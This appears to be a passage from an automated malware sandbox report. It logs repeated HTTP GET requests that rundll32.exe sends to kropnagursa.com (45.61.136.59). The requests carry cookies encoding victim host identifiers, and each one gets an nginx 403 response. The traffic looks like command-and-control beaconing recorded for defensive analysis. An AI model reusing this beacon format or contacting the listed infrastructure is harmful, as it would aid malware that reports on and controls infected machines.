                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            141192.168.2.44983745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:25.127875090 CET2288OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:25.292855024 CET2288INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:25 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            142192.168.2.44983845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:25.634840965 CET2289OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:25.809026003 CET2290INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:25 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            143192.168.2.44983945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:26.117404938 CET2291OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:26.282335043 CET2291INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            144192.168.2.44984045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:26.868609905 CET2292OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:27.036463976 CET2292INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            145192.168.2.44984145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:27.352909088 CET2293OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:27.517482042 CET2294INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            146192.168.2.44984245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:28.542951107 CET2295OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:28.707779884 CET2295INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            147192.168.2.44984345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:29.057413101 CET2296OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:29.222968102 CET2296INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:29 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            148192.168.2.44984445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:29.634341955 CET2297OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:29.799300909 CET2297INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:29 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            149192.168.2.44984545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:30.417213917 CET2298OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:30.582825899 CET2299INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:30 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            15192.168.2.44971145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:08.034463882 CET2127OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:08.208429098 CET2127INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:08 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            150192.168.2.44984645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:31.130084038 CET2300OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:31.303997040 CET2300INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            151192.168.2.44984745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:31.608551979 CET2301OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:31.773724079 CET2301INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            152192.168.2.44984845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:32.077625990 CET2302OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:32.242372990 CET2303INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            153192.168.2.44984945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:32.550512075 CET2303OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:32.715420008 CET2304INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            154192.168.2.44985045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:33.038295031 CET2305OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:33.212353945 CET2305INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:33 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            155192.168.2.44985145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:33.662183046 CET2306OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:33.826901913 CET2306INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:33 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
